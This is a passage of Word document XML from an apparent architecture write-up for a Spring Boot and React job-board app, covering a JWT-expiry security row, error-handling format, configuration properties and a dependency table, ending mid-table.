              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Brute-force attacks or replay of expired JWT tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Tokens expire strictly after 24 hours (86,400,000 ms). Expired tokens return 401 Unauthorized immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>23. Error Handling Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The system implements a centralized @RestControllerAdvice inside GlobalExceptionHandler.java. Any unhandled exception is caught, logged with SLF4J, and mapped into a standardized ApiError response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: Standardized ApiError JSON Envelope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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "timestamp": "2026-09-16T19:25:00.123Z",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "status": 404,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "error": "Not Found",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "message": "Job with id '999' does not exist",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "path": "/api/jobs/999"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>24. Configuration Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Properties Breakdown: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Configuration settings are externalized across development and production property files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>spring.datasource.url=jdbc:h2:mem:jobboard_db;DB_CLOSE_DELAY=-1 : In-memory persistent database across connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>spring.jpa.hibernate.ddl-auto=create-drop : Recreates clean schema on boot and populates seed data via DataInitializer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>jwt.secret=[SECRET REDACTED] : 256-bit cryptographic key used for HMAC-SHA256 signing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>jwt.expiration=86400000 : 24-hour expiration window in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>25. Dependency Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The project relies on production-grade dependencies managed via Maven (backend) and npm (frontend):</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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dependency Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifact Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Architectural Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Where Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>spring-boot-starter-data-jpa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hibernate 6 ORM, Spring Data abstraction, HikariCP connection pool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All backend repositories &amp; services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>spring-boot-starter-security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication, authorization, filter chains, BCryptPasswordEncoder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SecurityConfig, UserDetailsService</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>jjwt-api / jjwt-impl / jjwt-jackson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0.12.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HMAC-SHA256 JWT generation, claims extraction, token parsing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JwtUtil, JwtAuthenticationFilter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>springdoc-openapi-starter-webmvc-ui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2.3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OpenAPI 3.0 specification &amp; interactive Swagger UI documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>http://localhost:8080/swagger-ui/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>h2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2.2.224</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>In-memory relational database engine for zero-setup local dev and unit testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Development datasource</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mysql-connector-j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8.3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Production MySQL driver for seamless cloud deployment profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Production datasource</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>react / react-dom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>18.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
